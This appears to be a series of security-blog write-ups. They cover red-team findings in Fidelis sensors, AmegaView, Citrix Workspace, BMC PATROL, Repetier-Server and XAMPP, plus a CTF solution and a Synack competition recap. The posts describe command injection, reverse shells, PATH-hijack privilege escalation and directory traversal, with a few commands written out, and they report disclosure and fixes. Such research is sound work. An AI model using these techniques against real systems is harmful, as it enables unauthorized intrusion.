Given the role of each device, I think the most interesting target to an attacker would have to be a Sensor. If a Sensor can intercept (and possibly modify) traffic in transit, an attacker could leverage it to take control of the network. To confirm this theory, I logged in to a Sensor and began searching for the software and services needed to do this. I started by trying to identify the network interface(s) that the data would be traversing. To my surprise, the only interface that showed as being “up” was the IP address I logged in to. Time to RTFM.

A picture is worth a 1000 words. Based on the figures from the manual shown above, my guess is that the traffic is likely traversing one of the higher numbered interfaces. Now I just have to figure out why they aren’t visible to the root user. After searching through the logs, I found the following clue.

It appears a custom driver is being loaded to manage the interfaces responsible for the network traffic monitoring. Since the base OS is CentOS, it must be mounting them in some kind of security container that is restricting access to the devices which is why I can’t see it. After digging into the driver and some of the processes associated with it, I found that the software uses libpcap and a ring buffer in file-backed memory to intercept network traffic to be inspected/modified. This means to access all of the traffic flowing through the device all we have to do is read the files in the ring buffer and parse the raw network packets. Running the script for just a short time confirms our theory. We quickly notice the usual authentication flows for major websites like Microsoft 0365, Gmail, and even stock trading platforms. To put it plainly, compromise of a Fidelis sensor means an attacker would have unfettered access to all of the unencrypted credentials, PII, and sensitive data exiting the monitored network.

Given the impact of our discovery and what was possible post compromise on these devices, we wrapped up our assessment and immediately reached-out to the customer and the vendor to begin the disclosure process.

Vendor Disclosure & Patch

We are happy to report that the disclosure process with the vendor went smoothly and they worked with us to get the issues fixed and patched in a reasonable time frame. Given the severity of these findings, we strongly encourage anyone that has Fidelis Network & Deception appliances to update to the latest version immediately.

MesaLabs AmegaView: Information Disclosure to RCE

Amega Login Page

This article is in no way affiliated, sponsored, or endorsed with/by MesaLabs. All graphics are being displayed under fair use for the purposes of this article.

During a recent assessment, multiple vulnerabilities of varied bug types were discovered in the MesaLabs AmegaView Continous Monitoring System, including command injection (CVE-2021-27447, CVE-2021-27449), improper authentication (CVE-2021-27451), authentication bypass (CVE-2021-27453), and privilege escalation (CVE-2021-27445).  In this blog post, we will describe each of the vulnerabilities and how they were discovered.

Recon

While operating we often encounter devices that make up what we colloquially refer to as the “internet of things”, or simply IoT.  These are various network-enabled devices outside of the usual workstation, server, switches, routers, and printers.  IoT devices are often overlooked by network defenders since they often come with custom applications and are more difficult to adequately monitor.  As, red teamers we pay particular attention to these systems because they can provide reliable persistence on the network and are generally less secure. 

The first thing that caught my eye about the AmegaView login page was it required a passkey for authentication rather than the usual username and password.  My initial inclination was to gather more information about the passkey to determine if I could brute force it.  So I started where we all do, I checked the web page source.

Amega Log In Page
Login Page Source

The source code revealed a couple of details about the passkey.  The “size” and “max length” of the password field are set to 10.  We would still need more information to realistically brute force the passkey as 10 characters is too long.  However, the source code disclosed two more crucial pieces of information, the existence of the “/www” directory and the “/index.cgi?J=TIME_EDIT” endpoint.

www directory

Navigating to the “/www” directory in a web browser produces a directory listing which includes two perl files, among others.  We also find we can navigate to /index.cgi?J=TIME_EDIT without authentication.

The perl file “amegalib.pl” divulges quite a bit of information.  It defines how the passkey is generated,  and contains a function that executes privileged OS commands that is reachable from the “/index.cgi?J=TIME_EDIT” endpoint.  It also details the mechanism for authentication which includes two hardcoded cookie values, one for regular users and one for “super” users.

Exploitation

With so many vulns, where do we begin? First, I took the function that generates the passcode and simply ran it. The perl script produces what is typically a 4-6 digit number that is loosely based on the current time of the system. Using this passkey we can log into the system as a “super” user. Once logged in, the options available to a “super” user include the ability to upload new firmware, change certain system options, and the ability to run a “ping-out” test.

Super User Logged In

Clicking on the link to the “Ping-Out Test” brings us to a page that seems right out of a CTF.  We are presented with an input field that expects an IP address to ping.  Entering a IP address, we see that the server seems to be running the ping command 5 times and printing the output.  We quickly discover that arbitrary commands can be appended to the IP address using a pipe “|” character to give us command execution.

With proven command execution, the next step was to spawn a netcat reverse shell and began enumerating the file system in search of more vulnerabilities.

Privilege Escalation

Having discovered a way to execute commands as an unprivileged user, the next goal was to try to find a way to escalate to root on the underlying system.  We noticed a promising function in the “amegalib.pl” file called “run_SUcommand”.  Since the current user had the ability to write files to the web root, I just created a CGI file that called the “run_SUcommand” function from the “amegalib.pl” file. After confirming that worked, I used netcat again to spawn a shell as root.  After looking through the source code, I found this function is reachable as an authenticated user from the previously mentioned endpoint “/index.cgi?J=TIME_EDIT”. The vulnerable code is shown below.

The “set_datetime” function displayed above concatenates data supplied by the user and then passes it to the “run_SUcommand” function. Arbitrary code execution as the root user can be achieved by sending a specially crafted time update request with the desired shell commands as shown below.

Wrap Up

This product will reach its end of life at the end of December 2021.  MesaLabs has stated that they do not plan to release a patch, so system owners beware!

Hacking Citrix Storefront Users

This article is in no way affiliated, sponsored, or endorsed with/by Citrix Systems, Inc. All graphics are being displayed under fair use for the purposes of this article.

Hacking Citrix Storefront Users

With the substantial shift from traditional work environments to remote/telework capable infrastructures due to COVID-19, products like Citrix Storefront have seen a significant boost in deployment and usage. Due to this recent shift, we thought we’d present a subtle configuration point in Citrix Receiver that can be exploited for lateral movement across disjoint networks. More plainly, this (mis)configuration can allow an attacker that has compromised the virtual Citrix Storefront environment to compromise the systems of the users that connect to it using Citrix Receiver.

Oopsie

For those that aren’t familiar with Citrix Storefront, it is made up of multiple components. It is often associated with other Citrix products like Citrix Receiver\Workspace, XenApp, and XenDesktop. An oversimplification of what it provides is the ability for users to remotely access shared virtual machines or virtual applications.

To be able to remote in to these virtual environments, a user has to download and install Citrix Workspace (formerly Receiver). Upon install, the user is greeted with the following popup and the choice is stored in the registry for that user.

What we’ve found is that more often than not, end-users as well as group policy managed systems have this configuration set to “Permit All Access”. Likely because it isn’t very clear what you are permitting all access to, and whether it is necessary for proper usage of the application. I for one can admit to having clicked “Permit All Access” prior to researching what this setting actually means.

So what exactly does this setting do? It mounts a share to the current user’s drives on the remote Citrix virtual machine. If the user selects “Permit All Access”, it enables the movement of files from the remote system to the user’s shared drive.

Ok, so a user can copy files from the remote system, why is this a security issue? This is a security issue because there is now no security boundary between the user’s system and the remote Citrix environment. If the remote Citrix virtual machine is compromised, an attacker can freely write files to the connecting user’s shared drive without authentication.

Giving an attacker the ability to write files on your computer doesn’t sound that bad right? Especially if you are a low privileged user on the system. What could they possibly do with that? They could overwrite binaries that are executed by the user or operating system. A simple example of trivial code execution on Windows 10 is overwriting the OneDriveStandaloneUpdater binary that is located in the user’s AppData directory. This binary is called daily as a scheduled task.

Recommendations

Use the principle of least privilege when using Citrix Workspace to remote into a shared Citrix virtual environments. By default set the file security permissions for Citrix Workspace to “No Access” and only change it temporarily when it is necessary to copy files to or from the remote virtual environment. The following Citrix article explains how to change these settings in the registry.  https://support.citrix.com/article/CTX133565

BMC Patrol Agent – Domain User to Domain Admin – Part 2

**Securifera is in no way affiliated, sponsored, or endorsed with/by BMC. All graphics produced are in no way associated with BMC or it’s products and were created solely for this blog post. All uses of the terms BMC, PATROL, and any other BMC product trademarks is intended only for identification purposes and is to be considered fair use throughout this commentary. Securifera is offering no competing products or services with the BMC products being referenced.

Recap

A little over 2 years ago I wrote a blog post about a red team engagement I participated in for a customer that utilized BMC PATROL for remote administration on the network. The assessment culminated with our team obtaining domain admin privileges on the network by exploiting a critical vulnerability in the BMC PATROL software. After coordinating with the vendor we provided several mitigations to the customer. The vendor characterized the issue as a misconfiguration and guidance was given to how to better lock down the software. Two years later we executed a retest for the customer and this blog post will describe what we found.

From a red teamers perspective, the BMC PATROL software can be described as a remote administration tool. The vulnerability discovered in the previous assessment allowed an unprivileged domain user to execute commands on any Windows PATROL client as SYSTEM. If this doesn’t seem bad enough, it should be noted that this software was running on each of the customer’s domain controllers.

The proposed mitigation to the vulnerability was a couple of configuration changes that ensured the commands were executed on the client systems under the context of the authenticated user.

A specific PATROL Agent configuration parameter (/AgentSetup/pemCommands_policy = “U” ) can be enabled that ensures the PATROL Agent executes the command with (or using) the PATROL CLI connected user.

reference: https://docs.bmc.com/docs/display/pia100/Setting+the+default+account+for+PEM+commands.

Restricted mode. Only users from Administrators group can connect and perform operations (“/AgentSetup/accessControlList” = “:Administrators/*/CDOPSR”):

reference: https://docs.bmc.com/docs/PATROLAgent/113/security-guidelines-for-the-patrol-agent-766670159.html

Unprivileged Remote Command Execution

Given the results from our previous assessment, as soon as we secured a domain credential I decided to test out PATROL again. I started up the PatrolCli application and tried to send a command to test whether it would be executed as my user or a privileged one. (In the screenshot, the IP shows loopback because I was sending traffic through an SSH port forward)

The output suggested the customer had indeed implemented the mitigations suggested by the vendor. The command was no longer executed with escalated privileges on the target, but as the authenticated user. The next thing to verify was whether the domain implemented authorization checks were in place. To give a little background here, in most Windows Active Directory implementations, users are added to specific groups to define what permissions they have across the domain. Often times these permissions specify which systems a user can login to/execute commands on. This domain was no different in that very stringent access control lists were defined on the domain for each user.

A simple way to test whether or not authorization checks were being performed properly was to attempt to login/execute commands with a user on a remote Windows system using RDP, SMB, or WMI. Next, the same test would be performed using BMC PATROL and see if the results were the same. To add further confidence to my theory, I decided to test against the most locked down system on the domain, the domain controller. Minimal reconnaissance showed the DC only allowed a small group of users remote access and required an RSA token for 2FA. Not surprisingly, I was able to execute commands directly on the domain controller with an unprivileged user that did not have the permissions to login or remotely execute on the system with standard Windows methods.

As this result wasn’t largely unexpected based on my previous research, the next question to answer was whether or not I could do anything meaningful on a domain controller as an unprivileged user that had no defined permissions on the system. The first thing that stood out to me was the absence of a writable user folder since PATROL had undermined the OS’s external access permissions. This meant my file system permissions would be bound to those set for  the “Users”, “Authenticated Users”, and “Everyone” groups. To make things just a little bit harder, I discovered that a policy was in place that only allowed the execution of trusted signed executables.

Escalation of Privilege

With unprivileged remote command execution using PATROL, the next logical step was to try and escalate privileges on the remote system. As a red teamer, the need to escalate privileges for a unprivileged user to SYSTEM occurs pretty often. It is also quite surprising how common it is to find vulnerabilities that can be exploited to escalate privileges in Windows services and scheduled tasks. I spent a fair amount of time hunting for these types of bugs following research by James Forshaw and others several years back.

The first thing I usually check for when I’m looking for Windows privilege escalation bugs is if there are any writable folders defined in the current PATH environmental variable. For such an old and well known misconfiguration, I come across this ALL THE TIME. A writable folder in the PATH is not a guaranteed win. It is one of two requirements for escalating privileges. The second is finding a privileged process that insecurely loads a DLL or executes a binary. When I say insecurely, I am referring to not specifying the absolute path to the resource. When this happens, Windows attempts to locate the binary by searching the folders defined in the PATH variable. If an attacker has the ability to write to a folder in the PATH, they can drop a malicious binary that will be loaded or executed by the privileged process, thus escalating privileges.

Listing the environmental variables with “set” on the target reveals that it does indeed have a custom folder on the root of the drive in the PATH. At a glance I already have a good chance that it is writable because by default any new folder on the root of the drive is writable based on permission inheritance. A quick test confirms it.

With the first requirement for my privilege escalation confirmed, I then moved on to searching for a hijackable DLL or binary. The most common technique is to simply open up Sysinternals ProcessMonitor and begin restarting all the services and scheduled tasks on the system. This isn’t really a practical approach in our situation since one already has to be in a privileged context to be able to restart these processes and you need to be in an interactive session.

What we can do is attempt to model the target system in a test environment and perform this technique in hopes that any vulnerabilities will map to the target. The obvious first privileged service to investigate is BMC PATROL. After loading up process monitor and restarting the PatrolAgent service I add a filter to look for “NO SUCH FILE” and “NAME NOT FOUND” results. Unfortunately I don’t see any relative loading of DLLs. I do see something else interesting though.

What we’re seeing here is the PatrolAgent service executing “cmd /c bootime” whenever it is started. Since an absolute path is not specified, the operating system attempts to locate the application using the PATH. An added bonus is that the developers didn’t even bother to add an extension so we aren’t limited to an executable (This will be important later). In order for this to be successful, our writable folder has to be listed earlier in the search order than the actual path of the real bootime binary. Fortunate for me, the target system lists the writable folder first in the PATH search order. To confirm I can actually get execution, I drop a “boottime.bat” file in my test environment and watch as it is successfully selected from a folder in the PATH earlier in the search order.

So that’s it right? Time to start raining shells all over the network? Not quite yet. As most are probably aware, an unprivileged user doesn’t typically have the permissions necessary to restart a service. This means the most certain way to get execution is each time the system reboots. Unfortunately, on a server that could be weeks or longer, especially for a domain controller. Another possibility could be to try and crash the service and hope it is configured to restart. Before I capitulated to these ideas, I decided to research whether the application in its complex, robustness actually provided this feature in some way. A little googling later I came across the following link. Supposedly I could just run the following command from an adjacent system with PATROL and the remote service would restart.

pconfig +RESTART -host

Sure enough, it worked. I didn’t take the time to reverse engineer what other possibilities existed with this new “pconfig” application that apparently had the ability to perform at least some privileged operations, without authentication. I’ll leave that for PART 3 if the opportunity arises.

Combining all of this together, I now had all of the necessary pieces to again, achieve domain admin with only a low privileged domain user using BMC Patrol. I wrote “net user Administrators /add” to C:\Scripts\boottime.bat using PATROL and then executed “pconfig  +RESTART -host to restart the service and add my user to the local administrators group. I chose to go with “boottime.bat” rather than “boottime.exe” because it provided me with privileged command execution while also evading the execution policy that required trusted signed executables. It was almost to good to be true.

Following the assessment, I reached out to BMC to responsibly disclose the binary hijack in the PatrolAgent service. They were quick to reply and issue a patch. The vulnerability is being tracked as CVE-2020-35593.

Recommendations

The main lesson to be learned from this example is to always be cognizant of the security implications each piece of software introduces into your network. In this instance, the customer had invested significant time and resources to lock down their network. It had stringent access controls, group policies, and multiple 2 factor authentication mechanisms (smart card and RSA tokens). Unfortunately however, they also installed a remote administration suite that subverted almost all of these measures. While there are a myriad of third party remote administration tools for IT professionals at their disposal, often times it is much safer to just use the built-in mechanisms supported by the operating system for remote administration. At least this way there is a higher probability that it was designed to properly utilize the authentication and authorization systems in place.

A 3D Printed Shell

A 3D Printed Shell

With 3D printers getting a lot of attention with the COVID-19 pandemic, I thought I’d share a post about an interesting handful of bugs I discovered last year. The bugs were found in a piece of software that is used for remotely managing 3D printers. Chaining these vulnerabilities together enabled me to remotely exploit the Windows server hosting the software with SYSTEM level privileges. Let me introduce “Repetier-Server”, the remote 3D printer management software.

Exploration

Like many of my past targets, I came across this software while performing a network penetration test for a customer. I came across the page above while reviewing screenshots of all of the web servers in scope of the assessment. Having never encountered this software before, I loaded it up in my browser and started checking it out. After exploring some of the application’s features, I googled the application to see if I could find some documentation, or better, download a copy of the software to install. I was happy to find that not only could I download a free version of the software, but they also provided a nice user manual that detailed all of the features.

In scenarios where I can obtain the software, my approach to vulnerability discovery is slightly different than the typical black-box web application. Since I had access to the code, I had the ability to disassemble/decompile the software and directly search for vulnerabilities. With time constraints being a concern, I started with the low hanging fruit and worked towards the more complex vulnerabilities. I reviewed the documentation looking for mechanisms where the software might execute commands against the operating system. Often times, simple web applications are nothing more than a web-based wrapper around a set of shell commands.

I discovered the following blurb in the “Advanced Setup” section of the documentation that describes how a user can define “external” commands that can be executed by the web application.

As I had hoped, the application already had the ability to execute system commands, I just had to find a way to abuse it. The documentation provided the syntax and XML structure for the external command config file.

The video below demonstrates the steps necessary to define an external command, load it into the application, and execute it. These steps would become requirements for the exploit primitives I needed to discover in order to achieve remote code execution.

Discovery

Now that I had a feature to target, external commands, I needed to identify what the technical requirements were to reach that function. The first and primary goal was to find a way to write a file to disk from the web application. The second goal was ensuring I had sufficient control over the content of the file to pass any XML parsing checks. The remaining goals were nice to haves: a way to trigger a reboot/service restart, ability to read external command output, and file system navigation for debugging.

I started up Sysinternals Process Monitor to help me identify the different ways I could induce a file write from the web application. I then added a filter to only display file write operations by the RepetierServer.exe process.

Bug: 1  – File Upload & Download – Arbitrary Content – Constant PATH 

The first file write opportunity I found was in the custom watermark upload feature in the “Global Settings – > Timelapse” menu. Process Monitor shows the RepetierServer process writes the file to “C:\ProgramData\Repetier-Server\database\watermark.png”. I had to tweak my process monitor filters because the file first gets written to a temp file called upload1.bin and then renamed to watermark.png.

If you attempt to upload a file with an extension other than “.png” you will get a “Wrong file format” error. I opened up Burp to take a look at the HTTP request and see if modifying it in transit allowed us to bypass this check. Often times developers make the mistake of only performing client side security checks in Javascript, which can be easily bypassed by sending the request directly.

Manually manipulating each of the fields, I found a couple interesting results. It appears the only security check being performed server-side is a file extension check on the filename field in the request form. This check isn’t really necessary since the destination file on disk is constant. However, I did find that the file content can be whatever I want. The web application also provided another endpoint that allows for the retrieval of the watermark file. While this isn’t immediately useful, it means if I can write arbitrary data to the watermark file location, I can read it back remotely. I’ll save this away for later in case we need it.

Bug: 2  – File Upload – Uncontrolled Content – Partially Controlled PATH (Directory Traversal), Controlled File Name, Uncontrolled Extension  

Continuing with my mission of identifying file upload possibilities, I started to investigate the flow for adding a new printer to be managed by the web application. The printer creation wizard is pretty straightforward. The following video demonstrates how to create a fake printer on a Windows host running in VMware Workstation.

Based on the process monitor output, it appears that when a new printer is created, an XML file named after the printer is created in the “C:\ProgramData\Repetier-Server\configs” directory, as well as a matching directory in the “C:\ProgramData\Repetier-Server\printer” with additional subdirectories and files.

Attempting to identify the request responsible for creating the new printer in Burp proved elusive at first until I figured out that the web application utilizes websockets for much of the communication to the server. After some trial and error I identified the websocket request that creates the printer configuration file on disk.

From here I began modifying the different fields of the request to see what interesting effects might happen. Since the configuration file name mirrored the printer name, the first thing I tried was prepending a directory traversal string to the printer name in the websocket request to see if I could alter the path.   Given my goal of creating an external command configuration file, I named my printer “..\\database\\extcommands”. To my surprise, it worked!!

At this point I could write to the file location necessary to load a external command, getting me substantially closer to full remote code execution. However, I still could not control the file contents. I decided to go ahead and script up a quick POC to reliably exploit the vulnerability and move on.

Bug: 3  – File Upload & Download – Partially Controlled Content – Uncontrolled PATH – Insufficient Validation

Starting from where I left off with the directory traversal bug, I began investigating ways I could try and modify the printer configuration file that I had written as the external configuration file. Luckily for me, the web application provided a feature for downloading the current configuration file or replacing it with a new one.

Coming off the high from my last bug I figured why not just try and use this feature to upload the external command configuration file for the win. Nope… Still more work to do.

Since both files were XML, I began trying different combinations of elements from each configuration file to try and satisfy whatever validation checks were happening. After spending a fair amount of time on this I just decided to open the binary up in IDA Pro and look for myself. Rather than bore you with disassembly and the tedium that followed, I’ll skip right to the end. Given a lack of full validation being performed on each element of the printer configuration file and the external command configuration file, a single XML file could be constructed that passed validation for both by including the necessary elements that were being checked when each file was parsed. This means I was able to use the “Replace Printer Configuration” feature to add an external command to our extcommands.xml file.

Bug: 4  (BONUS) – Remote File System Enumeration

Digging further into the web application, I also discovered an interesting “feature” located in the “Global Settings – > Folders” menu. The web application allows a user to add a registered folder to import files for 3D printing. The first thing I noticed about this feature is that it is not constrained to a particular folder and can be used to navigate the folder structure of the entire target file system. This can be achieved by simply clicking the “Browse” button.

Since this feature references the ability to print from locations on disk, I decided to investigate further by creating a Folder at C:\ and seeing if I could find where the Folder is referenced. After creating a printer and selecting it from the main page, a menu can be selected that looks like a triangle in the top right of the page.

When I select the Folder the following window is displayed. If I deselect the “Filter Wrong File Types” checkbox, the dialog basically becomes a remote file browser for the system. The great thing about this feature from an attacker’s perspective is it gives me the ability to confirm exploitation of the directory traversal file upload vulnerability identified earlier.

Exploitation

Using the vulnerabilities discovered above, I mapped out the different stages of the exploit chain that needed to be implemented. The only piece that I lacked for the exploit chain was the ability to remotely restart the ReptierServer service or the system. Since the target system was a user’s workstation, I would just have to hope that they would reboot the system at some point in the near future. This also meant that replacing the external command would be impractical since it required a service restart each time. I would need to ensure that whatever external command I created was reliable and flexible enough to support the execution of subsequent system commands. Fortunately for me, I had just the bug for this. I could use the watermark file upload & download vulnerability as a medium for storing the commands I wanted to execute, and the resulting output. The following external command achieves this goal by reading from the watermark file, executing its contents, and then piping the output to the watermark file.

Copy to Clipboard

Putting this all together, I came up with the following exploit flow that needed to be implemented.

I implemented each step in this python POC. The following video demonstrates it in action against my test RepetierServer installation.

After successfully testing the POC, I executed it against the target server on the customer’s network. It took ~3 days until the system was rebooted, but I was ultimately able to remotely compromise the target. When the penetration test was complete, I reached out to the vendor to report the vulnerabilities and they were quick to patch the software and release an update. I also coordinated the findings with MITRE and two CVEs were issued, CVE-2019-14450 & CVE-2019-14451.

403 to RCE in XAMPP

403 to RCE in XAMPP

Some of the best advice I was ever given at how to become more successful at vulnerability discovery is to always try and dig a little deeper. Whether you are a penetration tester, red teamer, or bug bounty hunter, this advice has always proven true.  Far too often it is easy to become reliant on the latest “hacker” toolsets and other peoples exploits or research. When those fail, we often just move on to the next low hanging fruit rather than digging in.

On a recent assessment, I was performing my usual network recon and came across the following webpage while reviewing the website screenshots I had taken.

The page displayed a list of significantly outdated software that was running behind this webserver. Having installed XAMPP before, I was also familiar with the very manual and tedious process of updating each of the embedded services that are bundled with it. My first step was to try and enumerate any web applications that were being hosted on the webserver. Right now my tool of choice is dirsearch, mainly just because I’ve gotten used to its syntax and haven’t found a need to find something better.

After having zero success enumerating any endpoints on the webserver, I decided to setup my own XAMPP installation mirroring the target system. The download page for XAMPP can be found here. It has versions dating all the way back to 2003. From the 403 error page we can piece together what we need to download the right version of XAMPP. We know it’s a Windows install (Win32). If we lookup the release date for the listed PHP version we can see it was released in 2011.

Based on the release date we can reliably narrow it down to a couple of candidate XAMPP  installations.

After installing the software, I navigated to the apache configuration file directory to see what files were being served by default. The default configuration is pretty standard with the root directory being served out of C:\xampp\htdocs. What grabbed my attention was the “supplemental configurations” that were included at the bottom of the file.

The main thing to pay attention to in these configuration files is the lines that start with ScriptAlias as they map a directory on disk to one reachable from the web server. There are only two that show up. /cgi-bin/ and /php-cgi/. What is this php-cgi.exe? This seems awful interesting…

After a few searches on google, it seems the php-cgi binary has the ability to execute php code directly. I stumbled across an exploit that lists the version of the target as vulnerable, but it is targeting Linux instead of Windows. Since php is cross platform I can only assume the Windows version is also affected. The exploit also identifies the vulnerability as CVE-2012-1823.

Did I hit the jackpot??? Did XAMPP slide under the radar as being affected by this bug when it was disclosed? With this CVE in hand, I googled a little bit more and found an article by Praetorian that mentions the same php-cgi binary and conveniently includes a Metasploit module for exploiting it. Loading it up into metasploit, I changed the TARGETURI to /php-cgi/php-cgi.exe and let it fly. To my surprise, remote code execution as SYSTEM.

Bugs like this remind me to always keep an eye out for frameworks and software packages that are collections of other software libraries and services. XAMPP is a prime example because it has no built-in update mechanism and requires manual updates. Hopefully examples like this will help encourage others to always dig a little deeper on interesting targets.

Defcon 2020 Red Team Village CTF – Seeding Part 1 & 2

Defcon 2020 Red Team CTF – Seeding Part 1 & 2

Last month was Defcon and with it came the usual rounds of  competitions and CTFs. With work and family I didn’t have a ton of time to dedicate to the Defcon CTF so I decided to check out the Red Team Village CTF. The challenges for the qualifier ranged pretty significantly in difficulty as well as category but a couple challenges kept me grinding. The first was the fuzzing of a custom C2 server to retrieve a crash dump, which I could never get to crash (Feel free to leave comments about the solution). The second was a two part challenge called “Seeding” in the programming category that this post is about.

Connecting to the challenge service returns the following instructions:

We are also provided with the following code snippet from the server that shows how the random string is generated and how the PRNG is seeded.

The challenge seemed pretty straight forward. With the given seed and code for generating the random string, we should be able to recover the key given enough examples. The thing that made this challenge a little different than other “seed” based crypto challenges I’ve seen is that the string is constructed using random.choice() over the key rather than just generating numbers. A little tinkering with my solution script shows that the sequence of characters generated by random.choice() varies based on the length of the parameter provided, aka the key.

This means the first objective we have is to determine the length of the key. We can pretty easily determine the minimal key length by finding the complete keyspace by sampling outputs from the service until we stop getting new characters in the oracle’s output. However, this does not account for multiples of the same character in the key. So how do we get the full length of the key? We have to leverage the determinism of the sequence generated by random. If we relate random.choice() to random.randint() we see they are actually very similar except that random.choice() just maps the next number in the random sequence to an index in the string. This means if we select a key with unique characters, we should be able to identify the sequence generated by the PRNG by noting the indexes of the generated random characters in the key. It also means these indexes, or key positions, should be consistent across keys of the same length with the same seed.

Applying this logic we create a key index map using our custom key and then apply it to the sample fourth iteration string provided by the server to reveal the positions of each character in the unknown key. Assuming the key is longer than our keyspace, we will replace any unknown characters with “_” until we deduce them from each sample string.

Now we have the ability to derive a candidate key based on the indexes we’ve mapped given our key and the provided seed. Unfortunately this alone doesn’t bring us any closer to determining the unknown key length. What happens if we change the seed? If we change the seed we get a different set of indexes and a different sampling of key characters.

In the example above, you’ll notice that no characters in our derived keys conflict. This is because we know that the key length is 10, since we generated it. What happens if we try to derive a candidate key that is not 10 characters long using the generated 4th iteration random string from a 10 character key?

It appears if the length of the key used to generate the random string is not the same length as our local key, then characters in our derived keys do not match for each index. This is great news because that means we can find the server key length by incrementing our key length from the length of our key space until our derived keys don’t conflict.

Unfortunately, this is where I got stumped during the CTF. When I looped through the different key lengths I never got matching derived keys for the server key. After pouring over my code for several hours I finally gave up and moved on to other challenges. After the CTF was over I reached out to the challenge creator and he confirmed my approach was the right one. He was also kind enough to provide me with the challenge source code so I could troubleshoot my code. Executing the python challenge server and running my solution code yielded the following output.

So what gives??? Now it works??? I chalked it up to some coding mistake I must have magically fixed and decided to go ahead and finish out the solution. The next step is to derive the full server key by sampling the random output strings from different seeds. I simply added a loop around my previous code with an exit condition when there are no more underscores (“_”) in our key array. Unfortunately when I submitted the key I got an socket error instead of the flag.

Taking a look at the server code I see the author already added debugging that I can use to troubleshoot the issue. The logs show a familiar python3 error in regards to string encoding/decoding.

Well that’s an easy fix. I’ll just run the server with python3 and we’ll be back in business. To my surprise re-running my script displays the following.

This challenge just doesn’t want to be solved. Why don’t my derived keys match-up anymore? This feels familiar. Is it possible that different versions of python affect the sequences produced by random for the same seed?

Well there ya have it. Depending on the version of python you are running you will get different outputs from random for the same seed. I’m going to assume this wasn’t intentional. Either that or the author wanted to inflict some pain on all of us late adopters 🙂 Finishing up the solution, and running the server and solution code with python3 finally gave me the flags.

Even with all of the frustration I’d say it was a very satisfying challenge and I learned something new. Feel free to download the challenge and give it a go. Shout outs to @RedTeamVillage_, @nopresearcher, and @pwnEIP for hosting the CTF and especially the challenge creator @waldoirc.

Synack – Red Vs Fed Competition 2020

Preface

Obligatory statement: This blog post is in no way affiliated, sponsored, or endorsed with/by Synack, Inc. All graphics are being displayed under fair use for the purposes of this article.

Over the last few months Synack has been running a user engagement based competition called Red vs Fed. As can be deduced from the name, the competition was focused on penetration testing Synack’s federal customers. For those of you unfamiliar with Synack, it is a crowd-sourced hacking platform with a bug bounty type payment system. Hackers (consultants) are recruited from all over the planet to perform penetration testing services through Synack’s VPN-based platform. Some of the key differences marketed by Synack between other bounty platforms are a defined payout schedule based on vulnerability type and a 48 hour triage time.

Red Vs Fed

This section is going to be a general overview of my experience participating in my first hacking competition with Synack, Red Vs Fed. At times it may come off as a diatribe so feel free to jump forward to the technical notes that follow. In order for any of this to make sense we first have to start off with the competition rules and scoring. Points were awarded per “accepted” vulnerability based on the CVSS score determined by Synack on a scale of 1-10. There were also additional multipliers added once you passed a certain number of bugs accepted. The important detail here is the word “accepted”, which means you have to pass the myriad of exceptions, loopholes, and flat-out dismissal of submitted bugs as it goes through the Synack triage process. The information behind all of these “rules” is scattered across various help pages accessible by red team members. Example of some of these written, unwritten, and observed rules that will be referenced in this section:

  1. Shared code: If a report falls within about 10 different permutations of what may be guessed as shared code/same root issue, the report will be accepted at a substantially discounted payout or forced to be combined into a single report.
  2. 24 hour rule: In the first 24 hours of a new listing, any duplicate reports will be compared by triage staff and they will choose which report they feel has the highest “quality“. This is by far the most controversial and abused “feature” as it has led to report stuffing, favoritism, and even rewards given after clear violation of the Rules of Engagement.
  3. Customer rejected: Even though vulnerability acceptance and triage is marketed as being performed internally by Synack experts within 48 hours, randomly some reports may be sent to the customer for determination of rejection.
  4. Low Impact: Depending on the listing type, age of the listing, or individual triage staff, some bugs will be marked as low impact and rejected. This rule is specific to bugs that seem to be some-what randomly accepted on targets even though they all fall into the low impact category.
  5. Dynamic Out-of-Scope: Bug types, domains, and entire targets can be taken out of scope abruptly depending on report volume. There are loopholes to this rule if you happen to find load balancers or CNAME records for the same domain targets.
  6. Target Analytics: This is a feature not a rule but it seemed fitting for this list. When a vulnerability is accepted by Synack on a target, details like the bug type and location are released to all currently enrolled on the target.

About a month into the competition I was performing some rudimentary endpoint discovery (dirsearch, Burp intruder) on one of the legacy competition targets and had a breakthrough. I got a hit on a new virtual host on a server in the target scope, i.e. a new web application. When I come across a new application, one of the first things I try to do is to tune my wordlist for the next round of endpoint enumeration. I do this using endpoints defined in the source of the page, included javascript files, and identification of common patterns in naming, e.g. prefix_word_suffix.ext. On the next round of enumeration I hit the error page below.

A bug hunter can’t ask for an easier SQL injection vulnerability, verbose error messages, the actual SQL query with database names, tables names, and column names. I whipped up a POC, (discussed further down) and starting putting together a report for the bug. After a little more recon, I was able to uncover and report a handful of additional SQLi vulns over the next couple days. While continuing to discover and “prove” SQLi  on more endpoints, I was first introduced to (5) as the entire domain was taken out of scope for SQLi. No worries, at least my bugs were submitted so no one else should be able to swoop in and cleanup my leftovers. Well not exactly, it just so happened that there was a load balancer in front of my target as well as a defined CNAME (alias) for my domain. This meant thanks to (6) another competitor saw my bugs, knew about this loophole and was able to submit an additional 5 SQLi on this aliased domain before another dynamic OOS was issued.

At this point, the race was on to report as many vulnerabilities on this new web application now that my discovery was now public to the rest of the competitors via analytics.  I managed to get in a pretty wide range of vulnerabilities on the target but they were pretty well split with the individual that was already in second place, putting him into first place. With this web application pretty well picked through I began looking for additional vhosts on new subdomains in hopes of finding similar vulnerable applications. I also began to strategize about how best to submit vulnerabilities in regards to timing and grouping given my last outcome realizing these nuances could be the difference between other competitors scooping them up, Synack taking them out of scope, or forcing reports to be combined.

A couple weeks later I caught a lucky break. I came across a couple more web applications on a different subdomain that appeared to be using the same web technologies as my previous find and hopefully similarly buggy code. As I started enumerating the targets the bugs started stacking up. This time I took a different approach. Knowing that as soon as my reports hit analytics it would be a feeding frenzy amongst the other competitors, I began queuing up reports but not submitting them. After I had exhausted all the bugs I could find, I began to submit the reports in chunks. Chunks sized close to what I expected the tolerance for Synack to issue the vulnerability class OOS but also in small enough windows that hopefully other competitors wouldn’t be able to beat me to submission by watching analytics. Thankfully, I was able to slip in all of the reports just before the entire parent domain was taken OOS by Synack.

Back to the grind… After the last barrage of vulnerability submissions I managed to get dozens of websites taken out of scope so I had to set my sights on a new target. Luckily I had managed to position myself in first place after all of the reports had been triaged.

